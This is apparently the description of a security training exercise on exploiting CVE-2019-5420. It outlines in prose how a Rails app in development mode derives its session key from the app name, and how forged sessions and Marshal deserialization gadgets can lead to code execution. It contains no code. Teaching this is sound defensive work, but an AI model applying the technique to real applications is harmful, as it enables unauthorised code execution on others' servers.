cve-2019-5420 II
Bookmarked!This exercise details the exploitation of CVE-2019-5420 to gain code execution
In this course, we delve into a specific vulnerability (CVE-2019-5420) present in Ruby-on-Rails applications running in development mode. The vulnerability arises from the application deriving its session encryption key from the application's name, making it possible for attackers to guess the key if they know the app name. Once the key is known, attackers can decrypt, tamper with, and re-encrypt session data, potentially leading to code execution if the data is serialized using marshal
.
We begin by understanding the bug and reviewing the patch that addresses it. The course then guides you through a step-by-step exploitation process, leveraging knowledge from previous exercises like ruby_ugadget
and CVE-2019-5420
. By following along, you'll learn how to inspect cookie values, use deserialization gadgets, and execute payloads to achieve code execution. The course concludes with practical tips on identifying the issue during code reviews and exploiting ActiveStorage if it is used by the application.